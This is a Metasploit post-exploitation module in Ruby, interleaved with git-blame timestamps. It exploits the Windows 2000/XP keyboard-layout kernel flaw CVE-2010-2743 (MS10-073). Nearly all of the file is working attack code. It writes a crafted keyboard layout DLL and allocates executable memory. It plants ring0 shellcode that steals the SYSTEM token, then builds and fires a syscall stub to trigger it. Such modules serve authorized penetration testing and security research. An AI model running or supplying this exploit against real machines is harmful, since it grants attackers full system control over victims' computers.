2011-01-18 00:33:05 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2011-01-18 00:33:05 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'rex'
|
|
|
|
require 'metasm'
|
|
|
|
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Post
|
2011-01-18 00:33:05 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Windows Escalate NtUserLoadKeyboardLayoutEx Privilege Escalation',
|
|
|
|
'Description' => %q{
|
|
|
|
This module exploits the keyboard layout vulnerability exploited by Stuxnet. When
|
|
|
|
processing specially crafted keyboard layout files (DLLs), the Windows kernel fails
|
|
|
|
to validate that an array index is within the bounds of the array. By loading
|
|
|
|
a specially crafted keyboard layout, an attacker can execute code in Ring 0.
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'Ruben Santamarta', # First public exploit
|
|
|
|
'jduck' # Metasploit module
|
|
|
|
],
|
|
|
|
'Platform' => [ 'win' ],
|
|
|
|
'SessionTypes' => [ 'meterpreter' ],
|
|
|
|
'References' =>
|
|
|
|
[
|
2016-07-15 17:00:31 +00:00
|
|
|
[ 'OSVDB', '68552' ],
|
2013-08-30 21:28:54 +00:00
|
|
|
[ 'CVE', '2010-2743' ],
|
|
|
|
[ 'MSB', 'MS10-073' ],
|
|
|
|
[ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=71&Itemid=1' ],
|
|
|
|
[ 'EDB', '15985' ]
|
|
|
|
],
|
|
|
|
'DisclosureDate'=> "Oct 12 2010"
|
|
|
|
))
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
|
|
|
mem_base = nil
|
|
|
|
dllpath = nil
|
|
|
|
hDll = false
|
|
|
|
|
|
|
|
vuln = false
|
|
|
|
winver = session.sys.config.sysinfo["OS"]
|
|
|
|
affected = [ 'Windows 2000', 'Windows XP' ]
|
|
|
|
affected.each { |v|
|
|
|
|
if winver.include? v
|
|
|
|
vuln = true
|
|
|
|
break
|
|
|
|
end
|
|
|
|
}
|
|
|
|
if not vuln
|
|
|
|
print_error("#{winver} is not vulnerable.")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
# syscalls from http://j00ru.vexillium.org/win32k_syscalls/
|
|
|
|
if winver =~ /2000/
|
|
|
|
system_pid = 8
|
|
|
|
pid_off = 0x9c
|
|
|
|
flink_off = 0xa0
|
|
|
|
token_off = 0x12c
|
|
|
|
addr = 0x41424344
|
|
|
|
syscall_stub = <<-EOS
|
2011-01-18 00:33:05 +00:00
|
|
|
mov eax, 0x000011b6
|
|
|
|
lea edx, [esp+4]
|
|
|
|
int 0x2e
|
|
|
|
ret 0x1c
|
|
|
|
EOS
|
2013-08-30 21:28:54 +00:00
|
|
|
else # XP
|
|
|
|
system_pid = 4
|
|
|
|
pid_off = 0x84
|
|
|
|
flink_off = 0x88
|
|
|
|
token_off = 0xc8
|
|
|
|
addr = 0x60636261
|
|
|
|
syscall_stub = <<-EOS
|
2011-01-18 00:33:05 +00:00
|
|
|
mov eax, 0x000011c6
|
|
|
|
mov edx, 0x7ffe0300
|
|
|
|
call [edx]
|
|
|
|
ret 0x1c
|
|
|
|
EOS
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
ring0_code =
|
|
|
|
#"\xcc" +
|
|
|
|
# save registers -- necessary for successfuly recovery
|
|
|
|
"\x60" +
|
|
|
|
# get EPROCESS from ETHREAD
|
|
|
|
"\x64\xa1\x24\x01\x00\x00" +
|
|
|
|
"\x8b\x70\x44" +
|
|
|
|
# init PID search
|
|
|
|
"\x89\xf0" +
|
|
|
|
"\xbb" + "FFFF" +
|
|
|
|
"\xb9" + "PPPP" +
|
|
|
|
# look for the system pid EPROCESS
|
|
|
|
"\xba" + "SSSS" +
|
|
|
|
"\x8b\x04\x18" +
|
|
|
|
"\x29\xd8" +
|
|
|
|
"\x39\x14\x08" +
|
|
|
|
"\x75\xf6" +
|
|
|
|
# save the system token addr in edi
|
|
|
|
"\xbb" + "TTTT" +
|
|
|
|
"\x8b\x3c\x18" +
|
|
|
|
"\x83\xe7\xf8" +
|
|
|
|
# re-init the various offsets
|
|
|
|
"\x89\xf0" +
|
|
|
|
"\xbb" + "FFFF" +
|
|
|
|
"\xb9" + "PPPP" +
|
|
|
|
# find the target pid token
|
|
|
|
"\xba" + "TPTP" +
|
|
|
|
"\x8b\x04\x18" +
|
|
|
|
"\x29\xd8" +
|
|
|
|
"\x39\x14\x08" +
|
|
|
|
"\x75\xf6" +
|
|
|
|
# set the target pid's token to the system token
|
|
|
|
"\xbb" + "TTTT" +
|
|
|
|
"\x89\x3c\x18" +
|
|
|
|
# restore start context
|
|
|
|
"\x61" +
|
|
|
|
# recover in ring0, return to caller
|
|
|
|
"\xc2\x0c\00"
|
|
|
|
|
|
|
|
dll_data =
|
|
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
|
|
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
|
|
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
|
|
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00" +
|
|
|
|
"\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
|
|
|
|
"\x00\x00\x00\x00\xE0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
|
|
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
|
|
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
|
|
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
|
|
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
|
|
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
|
|
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
|
|
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
|
|
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
|
|
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
|
|
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
|
|
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
|
|
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
|
|
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
|
|
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x2E\x64\x61\x74\x61\x00\x00\x00" +
|
|
|
|
"\xE6\x00\x00\x00\x60\x01\x00\x00\xE6\x00\x00\x00\x60\x01\x00\x00" +
|
|
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
|
|
|
|
"\x94\x01\x00\x00\x9E\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
|
|
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
|
|
|
|
"\xA6\x01\x00\x00\xAA\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
|
|
|
|
"\x00\x00\x00\x00\x9C\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
|
|
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
|
|
|
|
"\x00\x00\x01\x00\x00\x00\xC2\x01\x00\x00\x00\x00\x00\x00\x00\x00" +
|
|
|
|
"\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
|
|
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
|
|
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
|
|
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
|
|
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
|
|
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
|
|
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
|
|
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
|
|
|
|
"\x00\x00\x00\x00\x00\x00"
|
|
|
|
|
|
|
|
pid = session.sys.process.getpid
|
|
|
|
print_status("Attempting to elevate PID 0x%x" % pid)
|
|
|
|
|
|
|
|
# Prepare the shellcode (replace platform specific stuff, and pid)
|
|
|
|
ring0_code.gsub!('FFFF', [flink_off].pack('V'))
|
|
|
|
ring0_code.gsub!('PPPP', [pid_off].pack('V'))
|
|
|
|
ring0_code.gsub!('SSSS', [system_pid].pack('V'))
|
|
|
|
ring0_code.gsub!('TTTT', [token_off].pack('V'))
|
|
|
|
ring0_code.gsub!('TPTP', [pid].pack('V'))
|
|
|
|
|
|
|
|
# Create the malicious Keyboard Layout file...
|
2013-12-19 01:43:59 +00:00
|
|
|
tmpdir = session.sys.config.getenv('TEMP')
|
2013-08-30 21:28:54 +00:00
|
|
|
fname = "p0wns.boom"
|
|
|
|
dllpath = "#{tmpdir}\\#{fname}"
|
|
|
|
fd = session.fs.file.new(dllpath, 'wb')
|
|
|
|
fd.write(dll_data)
|
|
|
|
fd.close
|
|
|
|
|
|
|
|
# Can't use this atm, no handle access via stdapi :(
|
|
|
|
#dll_fd = session.fs.file.new(dllpath, 'rb')
|
|
|
|
# Instead, we'll use railgun to re-open the file
|
|
|
|
ret = session.railgun.kernel32.CreateFileA(dllpath, GENERIC_READ, 1, nil, 3, 0, 0)
|
|
|
|
print_status(ret.inspect)
|
|
|
|
if ret['return'] < 1
|
|
|
|
print_error("Unable to open #{dllpath}")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
hDll = ret['return']
|
|
|
|
print_status("Wrote malicious keyboard layout to #{dllpath} ..")
|
|
|
|
|
|
|
|
# Allocate some RWX virtual memory for our use..
|
|
|
|
mem_base = addr & 0xffff0000
|
|
|
|
mem_size = (addr & 0xffff) + 0x1000
|
|
|
|
mem_size += (0x1000 - (mem_size % 0x1000))
|
|
|
|
mem = session.railgun.kernel32.VirtualAlloc(mem_base, mem_size, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
|
|
|
|
if (mem['return'] != mem_base)
|
|
|
|
print_error("Unable to allocate RWX memory @ 0x%x" % mem_base)
|
|
|
|
return
|
|
|
|
end
|
|
|
|
print_status("Allocated 0x%x bytes of memory @ 0x%x" % [mem_size, mem_base])
|
|
|
|
|
|
|
|
# Initialize the buffer to contain NO-OPs
|
|
|
|
nops = "\x90" * mem_size
|
|
|
|
ret = session.railgun.memwrite(mem_base, nops, nops.length)
|
|
|
|
if not ret
|
|
|
|
print_error("Unable to fill memory with NO-OPs")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
# Copy the shellcode to the desired place
|
|
|
|
ret = session.railgun.memwrite(addr, ring0_code, ring0_code.length)
|
|
|
|
if not ret
|
|
|
|
print_error("Unable to copy ring0 payload")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
# InitializeUnicodeStr(&uStr,L"pwn3d.dll"); -- Is this necessary?
|
|
|
|
pKLID = mem_base
|
|
|
|
pStr = pKLID + (2+2+4)
|
|
|
|
kbd_name = "pwn3d.dll"
|
|
|
|
uni_name = Rex::Text.to_unicode(kbd_name + "\x00")
|
|
|
|
ret = session.railgun.memwrite(pStr, uni_name, uni_name.length)
|
|
|
|
if not ret
|
|
|
|
print_error("Unable to copy unicode string data")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
unicode_str = [
|
|
|
|
kbd_name.length * 2,
|
|
|
|
uni_name.length,
|
|
|
|
pStr
|
|
|
|
].pack('vvV')
|
|
|
|
ret = session.railgun.memwrite(pKLID, unicode_str, unicode_str.length)
|
|
|
|
if not ret
|
|
|
|
print_error("Unable to copy UNICODE_STRING structure")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
print_status("Initialized RWX buffer ...")
|
|
|
|
|
|
|
|
# Get the current Keyboard Layout
|
|
|
|
ret = session.railgun.user32.GetKeyboardLayout(0)
|
|
|
|
if ret['return'] < 1
|
|
|
|
print_error("Unable to GetKeyboardLayout")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
hKL = ret['return']
|
|
|
|
print_status("Current Keyboard Layout: 0x%x" % hKL)
|
|
|
|
|
|
|
|
# _declspec(naked) HKL __stdcall NtUserLoadKeyboardLayoutEx(
|
|
|
|
# IN HANDLE Handle,
|
|
|
|
# IN DWORD offTable,
|
|
|
|
# IN PUNICODE_STRING puszKeyboardName,
|
|
|
|
# IN HKL hKL,
|
|
|
|
# IN PUNICODE_STRING puszKLID,
|
|
|
|
# IN DWORD dwKLID,
|
|
|
|
# IN UINT Flags
|
|
|
|
# )
|
|
|
|
|
|
|
|
# Again, railgun/meterpreter doesn't implement calling a non-dll function, so
|
|
|
|
# I tried to hack up this call to KiFastSystemCall, but that didn't work either...
|
2011-01-18 00:33:05 +00:00
|
|
|
=begin
|
2013-08-30 21:28:54 +00:00
|
|
|
session.railgun.add_function('ntdll', 'KiFastSystemCall', 'DWORD',
|
|
|
|
[
|
|
|
|
[ 'DWORD', 'syscall', 'in' ],
|
|
|
|
[ 'DWORD', 'handle', 'in' ],
|
|
|
|
[ 'DWORD', 'offTable', 'in' ],
|
|
|
|
[ 'PBLOB', 'pKbdName', 'in' ],
|
|
|
|
[ 'DWORD', 'hKL', 'in' ],
|
|
|
|
[ 'PBLOB', 'pKLID', 'in' ],
|
|
|
|
[ 'DWORD', 'dwKLID', 'in' ],
|
|
|
|
[ 'DWORD', 'Flags', 'in' ]
|
|
|
|
])
|
|
|
|
ret = session.railgun.ntdll.KiFastSystemCall(dll_fd, 0x1ae0160, nil, hKL, pKLID, 0x666, 0x101)
|
|
|
|
print_status(ret.inspect)
|
2011-01-18 00:33:05 +00:00
|
|
|
=end
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# Instead, we'll craft a machine code blob to setup the stack and perform
|
|
|
|
# the system call..
|
|
|
|
asm = <<-EOS
|
2011-01-18 00:33:05 +00:00
|
|
|
pop esi
|
|
|
|
push 0x101
|
|
|
|
push 0x666
|
|
|
|
push #{"0x%x" % pKLID}
|
|
|
|
push #{"0x%x" % hKL}
|
|
|
|
push 0
|
|
|
|
push 0x1ae0160
|
|
|
|
push #{"0x%x" % hDll}
|
|
|
|
push esi
|
|
|
|
#{syscall_stub}
|
|
|
|
EOS
|
2013-08-30 21:28:54 +00:00
|
|
|
#print_status("\n" + asm)
|
|
|
|
bytes = Metasm::Shellcode.assemble(Metasm::Ia32.new, asm).encode_string
|
|
|
|
#print_status("\n" + Rex::Text.to_hex_dump(bytes))
|
|
|
|
|
|
|
|
# Copy this new system call wrapper function into our RWX memory
|
|
|
|
func_ptr = mem_base + 0x1000
|
|
|
|
ret = session.railgun.memwrite(func_ptr, bytes, bytes.length)
|
|
|
|
if not ret
|
|
|
|
print_error('Unable to copy system call stub')
|
|
|
|
return
|
|
|
|
end
|
|
|
|
print_status("Patched in syscall wrapper @ 0x%x" % func_ptr)
|
|
|
|
|
|
|
|
# GO GO GO
|
|
|
|
ret = session.railgun.kernel32.CreateThread(nil, 0, func_ptr, nil, "CREATE_SUSPENDED", nil)
|
|
|
|
if ret['return'] < 1
|
|
|
|
print_error("Unable to CreateThread")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
hthread = ret['return']
|
|
|
|
|
|
|
|
# Resume the thread to actually have the syscall happen
|
|
|
|
ret = client.railgun.kernel32.ResumeThread(hthread)
|
|
|
|
if ret['return'] < 1
|
|
|
|
print_error("Unable to ResumeThread")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
print_status("Successfully executed syscall wrapper!")
|
|
|
|
|
|
|
|
# Now, send some input to cause ring0 payload execution...
|
|
|
|
print_status("Attempting to cause the ring0 payload to execute...");
|
|
|
|
vInput = [
|
|
|
|
1, # INPUT_KEYBOARD - input type
|
|
|
|
# KEYBDINPUT struct
|
|
|
|
0x0, # wVk
|
|
|
|
0x0, # wScan
|
|
|
|
0x0, # dwFlags
|
|
|
|
0x0, # time
|
|
|
|
0x0, # dwExtraInfo
|
|
|
|
0x0, # pad 1
|
|
|
|
0x0 # pad 2
|
|
|
|
].pack('VvvVVVVV')
|
|
|
|
ret = session.railgun.user32.SendInput(1, vInput, vInput.length)
|
|
|
|
print_status('SendInput: ' + ret.inspect)
|
|
|
|
|
|
|
|
ensure
|
|
|
|
# Clean up
|
|
|
|
if mem_base
|
|
|
|
ret = session.railgun.kernel32.VirtualFree(mem_base, 0, MEM_RELEASE)
|
|
|
|
if not ret['return']
|
|
|
|
print_error("Unable to free memory @ 0x%x" % mem_base)
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
#dll_fd.close
|
|
|
|
if hDll
|
|
|
|
ret = session.railgun.kernel32.CloseHandle(hDll)
|
|
|
|
if not ret['return']
|
|
|
|
print_error("Unable to CloseHandle")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
session.fs.file.rm(dllpath) if dllpath
|
|
|
|
|
|
|
|
end
|
2011-01-18 00:33:05 +00:00
|
|
|
|
|
|
|
|
|
|
|
end
|